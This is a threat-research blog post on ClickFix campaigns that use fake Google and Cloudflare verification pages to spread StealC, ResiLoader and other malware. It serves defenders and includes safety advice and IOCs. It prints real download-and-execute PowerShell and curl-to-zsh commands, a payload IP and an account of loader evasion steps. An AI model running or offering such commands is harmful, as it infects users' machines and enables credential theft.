Fake Google and Cloudflare verification pages spread multiple malware families

| July 2, 2026
Fake Google and Cloudflare verification pages spread multiple malware families

ClickFix attacks, which trick people into running malicious commands themselves, continue to evolve. This latest campaign uses fake Google and Cloudflare verification pages to convince victims to infect their own devices.

A single mistake can install malware that steals passwords and other sensitive data, gives attackers remote access to your computer, or downloads additional malware that can take full control of your system.

We uncovered multiple campaigns using the same infrastructure to deliver malware including HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, and a Rust-based stealer.

In one infection chain, a trojanized version of the legitimate Franz messaging app downloads a previously undocumented loader dubbed ResiLoader, which disables security software before deploying the StealC infostealer.

Before we look at the technical details, here’s how to avoid becoming the next victim.

How to stay safe

ClickFix attacks rely on convincing you to run commands yourself. The safest approach is simple:

  • Never copy and run commands from a website unless you’re following instructions from a trusted source and understand exactly what the command does.
  • Be wary of verification pages. Google, Cloudflare, Microsoft, and other legitimate services will never ask you to paste PowerShell commands into Windows to prove you’re human or fix a problem.
  • Don’t let urgency rush you. Fake verification pages often use countdown timers, visitor counters, or warnings to pressure you into acting quickly.
  • Keep your security software up to date. Real-time protection and web protection can help block malicious websites before you reach them.
  • Question unexpected technical instructions. If a website tells you to open PowerShell, Command Prompt, or Terminal, stop and verify the instructions through the company’s official support channels.

Pro tip: Malwarebytes Browser Guard can warn you when a website attempts to copy content to your clipboard—a common trick used by ClickFix pages.

Technical analysis

The campaigns analysed in this research have been active since at least late 2025 and use a variety of fake Google and Cloudflare pages to deliver malware. Although the lures differ, they share much of the same infrastructure and infection chain, with the attackers continually testing new delivery methods and payloads.

Different lures, one goal

Most of the campaigns share several characteristics:

  • Use of the folder C:\ProgramData\Zooms to extract later stages
  • PowerShell ClickFix commands that follow similar patterns
  • Use of Cloudflare R2 buckets to deliver payloads
  • IP addresses hosted by the ASN Dedik Services Limited
  • HTML responses containing only the phrase "hehe"

These indicators have changed over time, so they don’t appear in every infection chain. The campaigns continue to evolve, with new payloads and delivery methods regularly introduced. For example, in some cases, the IP address is used directly for payload distribution instead of buckets.

The final command copied by the user usually falls into this pattern: 

powershell -c “iex(irm ‘{IP}:{Port}/{Random Path}’ -UseBasicParsing)”

The port and the path are not always present in the cases analyzed; the ports are random, but some used ones are: 6600, 9900, 5506, 7895, 7493, 149, 8442. 

To execute these commands, several ClickFix-related templates are used, mainly related to Google and Cloudflare. We also detected that in some cases the PowerShell command was distributed through the IClickFix framework. 

We observed these ClickFix campaigns being distributed through:

  • Old websites that have likely expired and been repurchased by the actor(s).  
  • CloudFlare Pages (.pages.dev domains). 
  • Compromised websites. 
  • Fake services, for example related to QR code or web file access. 

Google ClickFix lures 

The actors behind these campaigns use various Google-related HTML pages and kits. 

One lure impersonates Google reCAPTCHA verification. The pages are hosted on random URLs that display fake or malicious content. These domains are often older registrations that recently began resolving to new IP addresses, suggesting they were repurposed for the campaign.

Some of these pages have URL parameters like such as “zoneid”, “cost”, “device”, “country”, “clickid”, for example: 

  • /conf/captcha.html?zoneid=10420852 
  • /wincapbot/nobot.html 
  • /xmr/trkuste.php?zone=5327134 
  • bless.php?zoneid=10327549&clickid=1091581084925173761&cost=0.000000&country=US&device=desktop 
"Manual Verification Required” ClickFix page
"Manual Verification Required” ClickFix page
“Manual Verification Required” ClickFix page

In this case, the functions related to ClickFix are implemented in the class CustomCaptcha.  The command is present in clear without any obfuscation. 

StartVerification” method in the “CustomCaptcha” class
StartVerification” method in the “CustomCaptcha” class

Another distribution method uses Cloudflare Pages hosted on .pages.dev subdomains.

"Verify you’re human” ClickFix page
“Verify you’re human” ClickFix page

In this case, the HTML page is obfuscated by declaring several variables and XORing them.  The deobfuscated code is called SECURITY GATEWAY and it’s composed of the functions GatewayRuntime, RemoteVault, BeaconDispatcher, Clipboard, TokenController, and PanelController.  

The code allows the attackers to retrieve the command either remotely or locally. In this sample, the malicious PowerShell command is stored locally.

The PowerShell command declared in the “SECURITY GATEWAY” code
The PowerShell command declared in the “SECURITY GATEWAY” code

We also found that some of these domains have distributed another decoy in the past, in this case associated with an unauthorized Google login. This ClickFix lure asks the user to copy and paste the malicious command to set their device as primary. 

“New sign-in with trusted token” ClickFix page
“New sign-in with trusted token” ClickFix page

The interesting part of this ClickFix kit is that it features an “approval gate,” as described in the comments, and that the attacker must manually choose from the panel which command to have the user execute. 

Comments about the kit and the “approval gate”
Comments about the kit and the “approval gate”
Comments about the kit and the “approval gate”

In more recent campaigns, we’ve detected a ClickFix lure related to Google Meet, which requires copying and pasting a malicious command to fix audio issues. 

The “fix audio driver” Meet ClickFix lure
The “fix audio driver” Google Meet ClickFix lure

In the analyzed cases, the endpoint /api/driver-clipboard.php returned the following malicious command:

{"mac":"curl -kfsSL $(echo '…'|base64 -D)|zsh","windows":"powershell -c \"iex(irm '151.240.151.126/rRlmZcaaZfAE3U2BaH' -UseBasicParsing)\""} 

Other lures 

The actors behind this campaign use various kits and lures, mostly related to Google. However, we’ve detected other lures that copied commands related to the same infrastructure. 

The attackers behind these campaigns also compromise multiple websites using different templates related to the CloudFlare ClickFix lure. 

“Verify you are human” ClickFix pages
“Verify you are human” ClickFix pages
“Verify you are human” ClickFix pages

We have detected several templates used for CloudFlare pages. The command is present in clear or in some cases obfuscated in the cases analyzed. 

Some of the CloudFlare ClickFix HTML pages 
Some of the CloudFlare ClickFix HTML pages 
Some of the CloudFlare ClickFix HTML pages 
Some of the CloudFlare ClickFix HTML pages 

We also detected some specifically created fake services websites.  For example, a “My QR Generator” site displays an obfuscated QR code and asks the user to run a PowerShell command to verify that the user is not a robot. 

“QR Code” ClickFix lure page 
“QR Code” ClickFix lure page 

In this case the command is encoded in base-64: 

Decoded PowerShell command
Decoded PowerShell command

PowerShell downloader 

The ClickFix command executed by the user decodes a script and drops it into the Temp folder with the name tmp{4 char}.tmp.ps1

We have detected several variations of this script, but recent versions do the following: 

  • Create the folder C:\ProgramData\Zooms
  • Download the next stage from a CloudFlare bucket and save it in C:\ProgramData\Zooms. In some variants of the script, the next stage is downloaded directly from an IP. 
  • Send the information of the compromised machine to http://{IP}/dl-callback. In some variants of the script, this part is not present. 
Dropped PowerShell script
Dropped PowerShell script

The attackers behind these campaigns use a large number of different payloads.The campaigns deliver a wide variety of payloads. The table below summarises some of the downloaded filenames and the malware they install. For many of the cases analyzed, the final payload was distributed via DLL Hijacking, as we will also see later for StealC stealer. 

File Distributed Malware distributed 
libEGL.zip, Safe-1.zip Trojanized Electron App, ResiLoader and StealC 
Test.msi Deno Loader and PowerShell Stealer 
arworks.zip Amatera Stealer 
water-night.zip Remus Stealer 
Setup.msi, Invintrum_first.msi NetSupport 
traffic1.msi CastleLoader 
ibrowser.exe Rust Stealer 

We analyzed a new loader called ResiLoader that ultimately distributes StealC. We also detected that the threat actor in the latest campaigns has started using Deno to distribute a stealer developed in PowerShell at the end; the analysis of this infection chain could be the subject of a future blog post. 

Trojanized Electron app downloads ResiLoader

In this case, the ZIP was downloaded from: 

  • pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev/libEGL.zip 

After extraction to: 

  • C:\ProgramData\Zooms\libEGL.zip_ext

The zip contains a trojanized version of the open-source messaging app called “Franz”: 

The trojanized "Franz" app used to download ResiLoader
The trojanized “Franz” app used to download ResiLoader

The malicious code is implemented in the index.js file: 

The obfuscated code in the backdoored app
The obfuscated code in the backdoored app

The downloader performs the following operations: 

  • Decode the strings with the function HC()
  • Reads readme.txt, expects a campaign key of the form AAAA-BBBB, returns it as an array of tokens. In this case the name is resiloader-1 and for this we call “ResiLoader” the downloaded DLL. 
  • Reads %APPDATA%\setup.txt; if absent, generates a random 8-char string and persists it.  
  • Obtaining persistence using app.setLoginItemSettings
  • Sends a POST request to https[:]//completstep[.]com/api/ and elaborate the JSON response
    • If task.e is present, it executes eval(task.e); it allows the attacker to execute arbitrary JavaScript code. 
    • If task.files is present, create %TEMP%\<Date.now()>\, decode and write each file; if any filename ends in .exe, run it via child_process.exec

In our case we received a ZIP that performs the DLL hijacking of ssh-add.exe

{"task":{"name":"JUNE18USY","files":{ 

   "msys-2.0.dll":"<base64>", 

   "msys-crypto-3.dll":"<base64>", 

   "msys-gcc_s-seh-1.dll":"<base64>", 

   "ssh-add.exe":"<base64>" }}}

After, the executable was executed with: 

C:\WINDOWS\system32\cmd.exe /d /s /c ""C:\Users\{user}\AppData\Local\Temp\1782122017599\ssh-add.exe"" 

ResiLoader

The msys-crypto-3.dll is an obfuscated .NET NativeAOT loader that implements AV/EDR evasion using a BYOD technique, obtain persistence and ultimately loads the stealer StealC.  We didn’t find a specific attribution for this loader and so we called it “ResiLoader” based on the string present in previous readme.txt

The loader contains several strings, some clear and some encrypted.  After decrypting the strings, it’s possible to have a full picture of the functionality of the ResiLoader. 

MANPO: ReadModule len=... 

MANPO: magicOffset=...
… 

PERS: FAIL all file copies failed, skipping run key 

PERS: FAIL both HKLM and HKCU Run key writes failed 
… 

RUNPE: CreateProcess failed 

RUNPE: PEB patched 

RUNPE: VirtualAllocEx failed 
… 

POST: RunForever exited (unexpected) 

POST: entering RunForever 

POST: hollow=

The loader performs the following operations: 

  • Extract the encoded blob containing two payloads reading the marker AtLorenBase and the length of the encoded blob. After, it decodes the blob and decrypts the driver pcdhost.sys (OPSWAT  
    AppRemover Driver) and StealC payload using a custom decryption algorithm.  
  • Terminate more than 140 processes related to EDR/AV processes using the dropped driver. 
  • Perform UAC bypass via ICMLuaUtil Elevated COM Interface. 
  • Create a folder C:\ProgramData\Google Update, copying itself; adding persistence using the RUN Registry Key 
  • cmd /c start "" /D "C:\ProgramData\Google Update" ssh-add.exe 

In the end, the loader performs process hollowing of the process ServiceModelReg.exe to run the StealC stealer. 

IOCs 

Hash 

72907d0ca3258365838626f6a8d993a6: ResiLoader DLL 

0234E3188F2883A438B3F2BEAB7A78B2: StealC 

6a9ac6b3fff7b695dbd4df6ff7f6c516: Remus 

206ce339febca0c3bcc850f42595fc63: Amatera Stealer 

eee416efcb1e33f220cdb4b05496a07a: NetSupport RAT 

b8d53740024d126cb55f83854335a4ab: Rust Stealer 

Domains 

Distribute ClickFix pages: 

onegeekworld[.]com 

thefirmos[.]com 

antibotv3[.]com 

centralwildcats[.]com 

cloud.antibotv3[.]com 

cloudautosolutions[.]com 

sunseekersupply[.]com 

123clocks[.]com 

orcanegames[.]com 

rwmonitoring[.]com 

100furniture[.]com 

nepalcharchaa[.]com 

p-floribunds.pages[.]dev 

pg-altirade2.pages[.]dev 

pg-cordivant-m6.pages[.]dev 

g-luminence.pages[.]dev 

generator-qrcode[.]online 

regdev-google[.]com 

khosla[.]capital 

eorgke09054909j[.]com 

dropboxi[.]com 

CloudFlare buckets used for payload distribution

pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev 

pub-620528e2dc874e16937673265aa23d39.r2[.]dev 

pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev 

pub-9682d5896df841679c5a17eb41273f89.r2[.]dev 

pub-18d99d0d18b94e85824c1cc4d5b5c637.r2[.]dev 

pub-0170eabb9df346bd822f863b7c3946e3.r2[.]dev 

pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev 

unitedstateverif[.]com: payload distribution 

bigflaredefence[.]com: payload distribution 

popularcard[.]shop: Rust Stealer C2 

xzz[.]proxygrid[.]cc: Amatera Stealer C2 

completstep[.]com: Loader C2 

eventlogerps1[.]ink: Deno Loader  

be231ro963[.]com: Deno Loader  

IPs 

IP used for payload distribution

151.240.151[.]126 

85.239.149[.]16 

85.239.149[.]40 

93.152.224[.]29 

151.240.151[.]46 

93.152.224[.]167 

85.239.149[.]78 

192.69.195[.]131 

135.181.171[.]40 

94.26.83[.]206 

91.92.34[.]128 

85.239.144[.]31 

93.152.224[.]39 

94.26.90[.]112 

146.19.248[.]120: StealC C2 

Acknowledgements  

About the author

Gabriele is a Malware Research Engineer who loves fighting malware. When he's not doing that, you’ll find him enjoying nature, art, and animals.